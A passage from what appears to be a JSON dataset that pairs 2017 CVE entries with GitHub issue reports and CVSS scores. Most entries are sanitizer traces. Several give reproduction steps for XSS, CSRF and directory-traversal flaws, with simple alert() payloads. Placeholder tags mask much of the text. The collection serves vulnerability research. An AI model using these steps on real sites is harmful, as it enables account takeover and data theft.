        "description": "memory leak in sgi. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7942",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/429",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/429",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-17T15:34:50Z",
        "description": "memory leak in avs. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7943",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/427",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/427",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-17T15:33:26Z",
        "description": "memory leak in svg. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f9da in APITAG APITAG NUMBERTAG ae6ca in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7946",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7301",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7301",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-04-18T09:55:20Z",
        "description": "Use after free in APITAG Use after free in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7962",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/15",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/15",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-12T10:38:59Z",
        "description": "divide by zero in iwgif_record_pixel (imagew gif.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7982",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/103",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/103",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-04-18T07:06:33Z",
        "description": "heap buffer overflow in APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c8 at pc NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG b NUMBERTAG sp NUMBERTAG bfb NUMBERTAG b4c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c8 thread T NUMBERTAG b7 in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG bbab in main PATHTAG NUMBERTAG b5fe6a NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7992",
        "Issue_Url_old": "https://github.com/hps/heartland-php/issues/28",
        "Issue_Url_new": "https://github.com/hps/heartland-php/issues/28",
        "Repo_new": "hps/heartland-php",
        "Issue_Created_At": "2017-02-22T14:55:08Z",
        "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to directly output user supplied data in HTTP GET parameter, this happended in the file PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET; FILETAG if $_GET contains evil js code, line NUMBERTAG will trigger untrusted code to be excuted on the browser side. So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8081",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1224",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1224",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2017-04-24T18:00:49Z",
        "description": "CVE NUMBERTAG generate_salt unnecessarily weak. [ ] mt_rand weak [ ] sub str sha1 to NUMBERTAG characters ( why )? we allow custom salt and it has no problems being longer than NUMBERTAG chars so i have no idea where this restriction came from. Do not see any breakage from removing it. refs NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8101",
        "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/452",
        "Issue_Url_new": "https://github.com/s9y/serendipity/issues/452",
        "Repo_new": "s9y/serendipity",
        "Issue_Created_At": "2017-02-26T03:35:34Z",
        "description": "Installation of theme is not secure with a CSRF token. version NUMBERTAG payload: URLTAG Use tag APITAG in another html to request this payload,after serendipity's admin visits it,theme will be changed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8102",
        "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/456",
        "Issue_Url_new": "https://github.com/s9y/serendipity/issues/456",
        "Repo_new": "s9y/serendipity",
        "Issue_Created_At": "2017-03-04T08:48:17Z",
        "description": "stored XSS in NUMBERTAG rc NUMBERTAG create a standard editor named \"test\", APITAG NUMBERTAG write a new entry ERRORTAG APITAG NUMBERTAG then post this entry,when admin view it ,XSS occur! APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-8109",
        "Issue_Url_old": "https://github.com/saltstack/salt/issues/40075",
        "Issue_Url_new": "https://github.com/saltstack/salt/issues/40075",
        "Repo_new": "saltstack/salt",
        "Issue_Created_At": "2017-03-16T11:11:12Z",
        "description": "salt ssh temporary files insecure permissions. When salt ssh sets up it's temporary location (eg. APITAG ), the files contained (eg. ERRORTAG ) are NUMBERTAG Some of these files may well contain sensitive data such as private keys (which when installed will be set to NUMBERTAG by the state). The permissions may be inherited from the salt master, but if these files come from a backend such as gitfs, they seem to have NUMBERTAG in the master gitfs cache (which in itself is a problem!) Run the following state with APITAG and check the files located in the temporary directory on the remote host. The APITAG file will be CODETAG Salt Version: Salt: APITAG Dependency Versions: cffi NUMBERTAG cherrypy NUMBERTAG dateutil: Not Installed gitdb: Not Installed gitpython: Not Installed ioflo: Not Installed Jinja NUMBERTAG libgit NUMBERTAG libnacl: Not Installed APITAG NUMBERTAG Mako: Not Installed msgpack pure: Not Installed msgpack python NUMBERTAG mysql python: Not Installed pycparser NUMBERTAG pycrypto NUMBERTAG pygit NUMBERTAG Python NUMBERTAG default, No NUMBERTAG python gnupg: Not Installed APITAG NUMBERTAG APITAG NUMBERTAG RAET: Not Installed smmap: Not Installed timelib: Not Installed Tornado NUMBERTAG ZMQ NUMBERTAG System Versions: dist: centos NUMBERTAG Core machine NUMBERTAG release NUMBERTAG APITAG system: Linux version: APITAG Linu NUMBERTAG Core `",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8115",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13432",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13432",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2017-04-21T15:59:20Z",
        "description": "Directory traversal vulnerability in FILETAG , please confirm!. [ ] Summary Hello, i found a directory traversal vulnerability in FILETAG . The vulnerability is due to defects in processing search parameters. the reproduction is below: Step to reproduce Accessing the FILETAG in POST mode, the POST parameters are PATHTAG e.g. URL: FILETAG POST: PATHTAG Vulnerability details please refer to the following links: link: URLTAG pass: vbyp Observed behavior It will causes the system directory information to leak Expected behavior It will causes the system directory information to leak Environment MODX version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8289",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/6840",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/6840",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2017-04-01T10:14:27Z",
        "description": "Stack Buffer Overflow Potential Denial of Service. I'd like to report a stack buffer overflow bug within RIOT without making it publicly known. I'm still doing some testing at the device level but a bug definitely exists, who is best to discuss with privately?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8294",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/646",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/646",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-04-26T05:33:55Z",
        "description": "Out of bounds read in APITAG Out of bounds read in APITAG Git HEAD: APITAG FILETAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8298",
        "Issue_Url_old": "https://github.com/cnvs/canvas/issues/331",
        "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/331",
        "Repo_new": "austintoddj/canvas",
        "Issue_Created_At": "2017-04-23T00:11:49Z",
        "description": "XSS vulnerability in creating Posts. Exploit Title: Stored XSS vulnerability possible in creating posts in canvas APITAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: XSS allows an attacker to run arbitrary scripts on the users browser. Exploit POC: APITAG used_: Chrome version NUMBERTAG Login as a user/ admin user NUMBERTAG Go to Posts > Add New NUMBERTAG The title and the content fields are vulnerable to stored XSS NUMBERTAG Enter APITAG alert('XSS in title') APITAG in the Title,'some subtitle' in subtitle and APITAG alert('XSS in content') APITAG in the content field NUMBERTAG Publish the post NUMBERTAG Now, navigate to the APITAG posts\" page. The script in the 'title' field will have executed and you will see an alert box with 'XSS in title NUMBERTAG Now go to the preview of this post by clicking on the magnifying glass next to the newly created post NUMBERTAG The script that we had entered in the content will now have executed and you will see an alert box with 'XSS in content'. References: URLTAG Screenshots: APITAG NUMBERTAG Creating a post. APITAG NUMBERTAG SS on APITAG posts\" page. APITAG NUMBERTAG Post created. APITAG NUMBERTAG SS on the post page. APITAG NUMBERTAG Post page. Impact: An attacker can execute arbitrary script on an unsuspecting user's browser. For instance Since, there is no seperation between the posts created by a privileged and an unprivileged user, an unprivileged user can create a post with script to steal the administrator's cookies or perform an action on his behalf. Mitigation: Input should be properly validated before storing in the database and output from the database should also be properly encoded before displaying it to the user.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-8301",
        "Issue_Url_old": "https://github.com/libressl-portable/portable/issues/307",
        "Issue_Url_new": "https://github.com/libressl/portable/issues/307",
        "Repo_new": "libressl/portable",
        "Issue_Created_At": "2017-04-25T17:16:04Z",
        "description": "Some nginx TLS tests started failing with APITAG NUMBERTAG but not with NUMBERTAG After we updated APITAG from NUMBERTAG to NUMBERTAG in Alpine Linux, we have noticed that some TLS related tests in nginx (both NUMBERTAG and NUMBERTAG started failing. Moreover, most of them fail because nginx accepted certificate that should be rejected! That\u2019s pretty bad regression. We\u2019re not sure if the problem is in APITAG nginx or nginx tests, so reporting it to both. CODETAG Complete log: FILETAG /cc APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2017-8302",
        "Issue_Url_old": "https://github.com/blueriver/MuraCMS/issues/2577",
        "Issue_Url_new": "https://github.com/blueriver/muracms/issues/2577",
        "Repo_new": "blueriver/MuraCMS",
        "Issue_Created_At": "2017-04-25T03:08:14Z",
        "description": "Bug report: XSS Vulnerabilities in many arguments of APITAG Steps to reproduce NUMBERTAG Login to site management, for example FILETAG NUMBERTAG Access following URL, browser will run any scripts posted to server, for example: alert NUMBERTAG to prompt a dialog ERRORTAG ERRORTAG APITAG Environment Win7 Lucee NUMBERTAG windows Latest stable build (mura NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-8343",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/444",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/444",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:41:24Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fba NUMBERTAG ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fba4b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8344",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/446",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/446",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:44:19Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f9b NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f9b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8345",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/442",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/442",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:39:50Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ada in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8346",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/440",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/440",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:37:18Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8347",
